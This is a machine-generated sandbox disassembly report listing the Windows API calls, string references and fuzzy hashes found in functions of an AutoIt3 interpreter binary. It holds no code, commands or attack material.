                                      • GetFileAttributesW.KERNEL32(?), ref: 0086E0BE
                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 0086E0D8
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086E0EA
                                      Strings
                                      Similarity
                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                      • String ID: *.*
                                      • API String ID: 34673085-438819550
                                      • Opcode ID: e6a7de04cfda30abeda00fb7bff4c8a11ec607dce5417d0820ffceb0a8fabd9d
                                      • Instruction ID: 27de06c46bf91712a7dfeebb9ce867e893f6d347cfe5d1c88930e81021ed4cb4
                                      • Instruction Fuzzy Hash: 2A818271A043459FCB64EF68C84496AB7E8FF99314F19882EF886C7251EF30D945CB52
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0088C8A4
                                      • GetFocus.USER32 ref: 0088C8B4
                                      • GetDlgCtrlID.USER32(00000000), ref: 0088C8BF
                                      • _memset.LIBCMT ref: 0088C9EA
                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0088CA15
                                      • GetMenuItemCount.USER32(?), ref: 0088CA35
                                      • GetMenuItemID.USER32(?,00000000), ref: 0088CA48
                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0088CA7C
                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0088CAC4
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0088CAFC
                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0088CB31
                                      Strings
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                      • String ID: 0
                                      • API String ID: 1296962147-4108050209
                                      • Opcode ID: dd44220e8723245a6c657225f0778402b4d8bffe42d7ba1060c730df1a926d04
                                      • Instruction ID: f74a07015e2b46792f96a0eef390abfdaab69fe20fd3050ce2d93a6e64f0014c
                                      • Instruction Fuzzy Hash: EA815771208315AFD714EF24C985A6ABBE8FF88314F04496EF995E3291D730D905CFA2
                                      APIs
                                        • Part of subcall function 00858E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00858E3C
                                        • Part of subcall function 00858E20: GetLastError.KERNEL32(?,00858900,?,?,?), ref: 00858E46
                                        • Part of subcall function 00858E20: GetProcessHeap.KERNEL32(00000008,?,?,00858900,?,?,?), ref: 00858E55
                                        • Part of subcall function 00858E20: HeapAlloc.KERNEL32(00000000,?,00858900,?,?,?), ref: 00858E5C
                                        • Part of subcall function 00858E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00858E73
                                        • Part of subcall function 00858EBD: GetProcessHeap.KERNEL32(00000008,00858916,00000000,00000000,?,00858916,?), ref: 00858EC9
                                        • Part of subcall function 00858EBD: HeapAlloc.KERNEL32(00000000,?,00858916,?), ref: 00858ED0
                                        • Part of subcall function 00858EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00858916,?), ref: 00858EE1
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00858B2E
                                      • _memset.LIBCMT ref: 00858B43
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00858B62
                                      • GetLengthSid.ADVAPI32(?), ref: 00858B73
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00858BB0
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00858BCC
                                      • GetLengthSid.ADVAPI32(?), ref: 00858BE9
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00858BF8
                                      • HeapAlloc.KERNEL32(00000000), ref: 00858BFF
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00858C20
                                      • CopySid.ADVAPI32(00000000), ref: 00858C27
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00858C58
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00858C7E
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00858C92
                                      Similarity
                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                      • String ID:
                                      • API String ID: 3996160137-0
                                      • Opcode ID: 8dfd8998d00b4ab3a7ba6f111dc3aa9bd52fa345f2ccc30a816bd96f55ea86b7
                                      • Instruction ID: e80e123a3a53630d2c5e5cf0892db5a22cc0e838eac990674c85d62c97e0c102
                                      • Instruction Fuzzy Hash: 42615771900209EFDF109FA4DC45EAEBBB9FF05301F08816AE915E7290DB359A09CF60
                                      APIs
                                      • GetDC.USER32(00000000), ref: 00877A79
                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00877A85
                                      • CreateCompatibleDC.GDI32(?), ref: 00877A91
                                      • SelectObject.GDI32(00000000,?), ref: 00877A9E
                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00877AF2
                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00877B2E
                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00877B52
                                      • SelectObject.GDI32(00000006,?), ref: 00877B5A
                                      • DeleteObject.GDI32(?), ref: 00877B63
                                      • DeleteDC.GDI32(00000006), ref: 00877B6A
                                      • ReleaseDC.USER32(00000000,?), ref: 00877B75
                                      Strings
                                      Similarity
                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                      • String ID: (
                                      • API String ID: 2598888154-3887548279
                                      • Opcode ID: 4577615cc314f4358a8802f99667ddf5be96cea2821205d6f5da22279df8f058
                                      • Instruction ID: b1ce7660112fb70041e68bf99c10e6b749bc375689c5a58a9448436eabbd7353
                                      • Instruction Fuzzy Hash: 57513772904319AFDB15DFA8DC85EAEBBB9FF48310F14841AE94AE7250D731A940CB60
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0086A4D4
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 0086A4F6
                                      • __swprintf.LIBCMT ref: 0086A54F
                                      • __swprintf.LIBCMT ref: 0086A568
                                      • _wprintf.LIBCMT ref: 0086A61E
                                      • _wprintf.LIBCMT ref: 0086A63C
                                      Strings
                                      Similarity
                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 311963372-2391861430
                                      • Opcode ID: c7dedc6d8457bee0e82cda4069edf029604fc960b63ed98fe18401ec5c73cb39
                                      • Instruction ID: 0aaf7d495516df53c2b821f7072e017c7808a852b781413aae35d2e2b86696ea
                                      • Instruction Fuzzy Hash: E0516971900119AACF19EBA4CD4AEEEB779FF14340F100165B615F21A2EB356F98CF52
                                      APIs
                                        • Part of subcall function 0086951A: __time64.LIBCMT ref: 00869524
                                        • Part of subcall function 00814A8C: _fseek.LIBCMT ref: 00814AA4
                                      • __wsplitpath.LIBCMT ref: 008697EF
                                        • Part of subcall function 0082431E: __wsplitpath_helper.LIBCMT ref: 0082435E
                                      • _wcscpy.LIBCMT ref: 00869802
                                      • _wcscat.LIBCMT ref: 00869815
                                      • __wsplitpath.LIBCMT ref: 0086983A
                                      • _wcscat.LIBCMT ref: 00869850
                                      • _wcscat.LIBCMT ref: 00869863
                                        • Part of subcall function 00869560: _memmove.LIBCMT ref: 00869599
                                        • Part of subcall function 00869560: _memmove.LIBCMT ref: 008695A8
                                      • _wcscmp.LIBCMT ref: 008697AA
                                        • Part of subcall function 00869CF1: _wcscmp.LIBCMT ref: 00869DE1
                                        • Part of subcall function 00869CF1: _wcscmp.LIBCMT ref: 00869DF4
                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00869A0D
                                      • _wcsncpy.LIBCMT ref: 00869A80
                                      • DeleteFileW.KERNEL32(?,?), ref: 00869AB6
                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00869ACC
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00869ADD
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00869AEF
                                      Similarity
                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                      • String ID:
                                      • API String ID: 1500180987-0
                                      • Opcode ID: 02c353b74bb55326b982c0c59f13177e1d4dc43004f526fe31b76cd53089582b
                                      • Instruction ID: d7c87ccdda619a5d3bc3b1aba663498a30f3f846995dc9afe09ccfac516a8516
                                      • Instruction Fuzzy Hash: 87C12DB1900229AADF21DF99DC85EDEB7BDFF44310F0040AAF649E7151EB709A848F65
                                      APIs
                                      • _memset.LIBCMT ref: 00815BF1
                                      • GetMenuItemCount.USER32(008C7890), ref: 00850E7B
                                      • GetMenuItemCount.USER32(008C7890), ref: 00850F2B
                                      • GetCursorPos.USER32(?), ref: 00850F6F
                                      • SetForegroundWindow.USER32(00000000), ref: 00850F78
                                      • TrackPopupMenuEx.USER32(008C7890,00000000,?,00000000,00000000,00000000), ref: 00850F8B
                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00850F97
                                      Similarity
                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                      • String ID:
                                      • API String ID: 2751501086-0
                                      • Opcode ID: f0b62edefb973806fa7ecd22d9de49381ba482f28e99ed825bb47a3c36d666ce
                                      • Instruction ID: e23304cbb50fa60c98ccea2650d247a662c3d255cd9c90c4371244c8e1373102
                                      • Instruction Fuzzy Hash: 6D71F030604609BFEB219F54DC86FAABF69FF44365F240216F928EA1D0C7B16864DF91
                                      APIs
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      • _memset.LIBCMT ref: 00858489
                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008584BE
                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008584DA
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008584F6
                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00858520
                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00858548
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00858553
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00858558
                                      Strings
                                      Similarity
                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                      • API String ID: 1411258926-22481851
                                      • Opcode ID: 8c80033800c87dba05d95ba55fb964fb663231bb0b68622cdab6294dc2760094
                                      • Instruction ID: ebed3f2e2563ceb6950dd08b84096a2332889783c4094134b246b6f295101973
                                      • Instruction Fuzzy Hash: 95410772D1062DABCF11EBA8DC95DEDB7B8FF08741B04412AE915F2261EB305E48CB91
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0088040D,?,?), ref: 00881491
                                      Strings
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                      • API String ID: 3964851224-909552448
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0084FB41,00000010,?,Bad directive syntax error,00890980,00000000,?,?,?), ref: 0085FF7D
                                      • LoadStringW.USER32(00000000,?,0084FB41,00000010), ref: 0085FF84
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      • _wprintf.LIBCMT ref: 0085FFB7
                                      • __swprintf.LIBCMT ref: 0085FFD9
                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00860048
                                      Similarity
                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                      • API String ID: 1506413516-4153970271
                                      APIs
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                        • Part of subcall function 0081153B: _memmove.LIBCMT ref: 008115C4
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008658EB
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00865901
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00865912
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00865924
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00865935
                                      Similarity
                                      • API ID: SendString$_memmove
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 2279737902-1007645807
                                      Similarity
                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                      • String ID: 0.0.0.0
                                      • API String ID: 208665112-3771769585
                                      APIs
                                      • timeGetTime.WINMM ref: 00865535
                                        • Part of subcall function 00820859: timeGetTime.WINMM(?,00000002,0080C22C), ref: 0082085D
                                      • Sleep.KERNEL32(0000000A), ref: 00865561
                                      • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00865585
                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008655A7
                                      • SetActiveWindow.USER32 ref: 008655C6
                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008655D4
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 008655F3
                                      • Sleep.KERNEL32(000000FA), ref: 008655FE
                                      • IsWindow.USER32 ref: 0086560A
                                      • EndDialog.USER32(00000000), ref: 0086561B
                                      Similarity
                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                      • String ID: BUTTON
                                      • API String ID: 1194449130-3405671355
                                      APIs
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      • CoInitialize.OLE32(00000000), ref: 0086DC2D
                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0086DCC0
                                      • SHGetDesktopFolder.SHELL32(?), ref: 0086DCD4
                                      • CoCreateInstance.OLE32(00893D4C,00000000,00000001,008BB86C,?), ref: 0086DD20
                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0086DD8F
                                      • CoTaskMemFree.OLE32(?,?), ref: 0086DDE7
                                      • _memset.LIBCMT ref: 0086DE24
                                      • SHBrowseForFolderW.SHELL32(?), ref: 0086DE60
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0086DE83
                                      • CoTaskMemFree.OLE32(00000000), ref: 0086DE8A
                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0086DEC1
                                      • CoUninitialize.OLE32(00000001,00000000), ref: 0086DEC3
                                      Similarity
                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                      • String ID:
                                      • API String ID: 1246142700-0
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00860896
                                      • SetKeyboardState.USER32(?), ref: 00860901
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00860921
                                      • GetKeyState.USER32(000000A0), ref: 00860938
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00860967
                                      • GetKeyState.USER32(000000A1), ref: 00860978
                                      • GetAsyncKeyState.USER32(00000011), ref: 008609A4
                                      • GetKeyState.USER32(00000011), ref: 008609B2
                                      • GetAsyncKeyState.USER32(00000012), ref: 008609DB
                                      • GetKeyState.USER32(00000012), ref: 008609E9
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00860A12
                                      • GetKeyState.USER32(0000005B), ref: 00860A20
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      APIs
                                      • GetDlgItem.USER32(?,00000001), ref: 0085CE1C
                                      • GetWindowRect.USER32(00000000,?), ref: 0085CE2E
                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0085CE8C
                                      • GetDlgItem.USER32(?,00000002), ref: 0085CE97
                                      • GetWindowRect.USER32(00000000,?), ref: 0085CEA9
                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0085CEFD
                                      • GetDlgItem.USER32(?,000003E9), ref: 0085CF0B
                                      • GetWindowRect.USER32(00000000,?), ref: 0085CF1C
                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0085CF5F
                                      • GetDlgItem.USER32(?,000003EA), ref: 0085CF6D
                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0085CF8A
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0085CF97
                                      Similarity
                                      • API ID: Window$ItemMoveRect$Invalidate
                                      • String ID:
                                      • API String ID: 3096461208-0
                                      APIs
                                        • Part of subcall function 00801F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00802412,?,00000000,?,?,?,?,00801AA7,00000000,?), ref: 00801F76
                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008024AF
                                      • KillTimer.USER32(00000000,?,?,?,?,00801AA7,00000000,?,?,00801EBE,?,?), ref: 0080254A
                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0083BFE7
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00801AA7,00000000,?,?,00801EBE,?,?), ref: 0083C018
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00801AA7,00000000,?,?,00801EBE,?,?), ref: 0083C02F
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00801AA7,00000000,?,?,00801EBE,?,?), ref: 0083C04B
                                      • DeleteObject.GDI32(00000000), ref: 0083C05D
                                      Similarity
                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 641708696-0
                                      APIs
                                        • Part of subcall function 008029AB: GetWindowLongW.USER32(?,000000EB), ref: 008029BC
                                      • GetSysColor.USER32(0000000F), ref: 008025AF
                                      Similarity
                                      • API ID: ColorLongWindow
                                      • String ID:
                                      • API String ID: 259745315-0
                                      APIs
                                        • Part of subcall function 00820B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00812A3E,?,00008000), ref: 00820BA7
                                        • Part of subcall function 00820284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00812A58,?,00008000), ref: 008202A4
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00812ADF
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00812C2C
                                        • Part of subcall function 00813EBE: _wcscpy.LIBCMT ref: 00813EF6
                                        • Part of subcall function 0082386D: _iswctype.LIBCMT ref: 00823875
                                      Similarity
                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                      • API String ID: 537147316-3738523708
                                      APIs
                                      • CharLowerBuffW.USER32(?,?,00890980), ref: 0086AF4E
                                      • GetDriveTypeW.KERNEL32(00000061,008BB5F0,00000061), ref: 0086B018
                                      • _wcscpy.LIBCMT ref: 0086B042
                                      Similarity
                                      • API ID: BuffCharDriveLowerType_wcscpy
                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 2820617543-1000479233
                                      Similarity
                                      • API ID: __i64tow__itow__swprintf
                                      • String ID: %.15g$0x%p$False$True
                                      • API String ID: 421087845-2263619337
                                      • Opcode ID: 0a86dbf1fb9f3db911867a8291ae8e9e9ebc14eafa223d3cd4ea2b2c427f71c4
                                      • Instruction ID: 55988599cbe6784503212627988ac04781b647c50d6f1084ae1b363181d5bf7b
                                      • Opcode Fuzzy Hash: 0a86dbf1fb9f3db911867a8291ae8e9e9ebc14eafa223d3cd4ea2b2c427f71c4
                                      • Instruction Fuzzy Hash: C741F371644219AFDB24DF28ED42E7A73E8FF44304F20446EE649D72D2EA3199818B51
                                      APIs
                                      • _memset.LIBCMT ref: 0088778F
                                      • CreateMenu.USER32 ref: 008877AA
                                      • SetMenu.USER32(?,00000000), ref: 008877B9
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00887846
                                      • IsMenu.USER32(?), ref: 0088785C
                                      • CreatePopupMenu.USER32 ref: 00887866
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00887893
                                      • DrawMenuBar.USER32 ref: 0088789B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                      • String ID: 0$F
                                      • API String ID: 176399719-3044882817
                                      • Opcode ID: 65a46a304fd2edbf05db0baa43cdbc1890a1a60282b910968492ec411e7bfe89
                                      • Instruction ID: edbed7da4423f0cea0c410b989db33dbdf493f26ccde46f9b021974ae8205f6d
                                      • Opcode Fuzzy Hash: 65a46a304fd2edbf05db0baa43cdbc1890a1a60282b910968492ec411e7bfe89
                                      • Instruction Fuzzy Hash: EE414574A00209EFDB10EF64D988A9ABBB5FF48310F280029ED45E7360C731A910CF54
                                      APIs
                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00887B83
                                      • CreateCompatibleDC.GDI32(00000000), ref: 00887B8A
                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00887B9D
                                      • SelectObject.GDI32(00000000,00000000), ref: 00887BA5
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00887BB0
                                      • DeleteDC.GDI32(00000000), ref: 00887BB9
                                      • GetWindowLongW.USER32(?,000000EC), ref: 00887BC3
                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00887BD7
                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00887BE3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                      • String ID: static
                                      • API String ID: 2559357485-2160076837
                                      • Opcode ID: bd5fafe96067189fd2141bb79c4f9a88963eebc80b690d472ff79c4e2e53c4e2
                                      • Instruction ID: 735e1e9cb1445e1c969f5af7780d24b79e26b56bbc0af7b47d820151a6a2e23f
                                      • Opcode Fuzzy Hash: bd5fafe96067189fd2141bb79c4f9a88963eebc80b690d472ff79c4e2e53c4e2
                                      • Instruction Fuzzy Hash: 25314932104219AFDF12AFA4DC49FDB3B7AFF09320F250215FA55A61A0C731D821DBA4
                                      APIs
                                      • _memset.LIBCMT ref: 0082706B
                                        • Part of subcall function 00828D58: __getptd_noexit.LIBCMT ref: 00828D58
                                      • __gmtime64_s.LIBCMT ref: 00827104
                                      • __gmtime64_s.LIBCMT ref: 0082713A
                                      • __gmtime64_s.LIBCMT ref: 00827157
                                      • __allrem.LIBCMT ref: 008271AD
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008271C9
                                      • __allrem.LIBCMT ref: 008271E0
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008271FE
                                      • __allrem.LIBCMT ref: 00827215
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00827233
                                      • __invoke_watson.LIBCMT ref: 008272A4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                      • String ID:
                                      • API String ID: 384356119-0
                                      • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                      • Instruction ID: e2bb702b82078b5b78706857fb9cd61f9e5697bb0c369cc6a6c961b0c02becb8
                                      • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                      • Instruction Fuzzy Hash: 7371F771A04B27EBE7149E7EEC42B5AB3A9FF50324F14422AF514E7281E770DA8487D1
                                      APIs
                                      • _memset.LIBCMT ref: 00862CE9
                                      • GetMenuItemInfoW.USER32(008C7890,000000FF,00000000,00000030), ref: 00862D4A
                                      • SetMenuItemInfoW.USER32(008C7890,00000004,00000000,00000030), ref: 00862D80
                                      • Sleep.KERNEL32(000001F4), ref: 00862D92
                                      • GetMenuItemCount.USER32(?), ref: 00862DD6
                                      • GetMenuItemID.USER32(?,00000000), ref: 00862DF2
                                      • GetMenuItemID.USER32(?,-00000001), ref: 00862E1C
                                      • GetMenuItemID.USER32(?,?), ref: 00862E61
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00862EA7
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00862EBB
                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00862EDC
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                      • String ID:
                                      • API String ID: 4176008265-0
                                      • Opcode ID: f0b6ce60e20d32228ceb97845f736dbfa2af02c9b7a839bd6b3b3114f3877df7
                                      • Instruction ID: e2a06cad7ebe425ee9a29e9ae851d5753615c4a3e5e0d87db17d7b7d5bc02743
                                      • Opcode Fuzzy Hash: f0b6ce60e20d32228ceb97845f736dbfa2af02c9b7a839bd6b3b3114f3877df7
                                      • Instruction Fuzzy Hash: E6619E71900649AFDB11DF64DC88EAE7BB8FB41304F1640AAF841E7252D732AD05CB21
                                      APIs
                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 008875CA
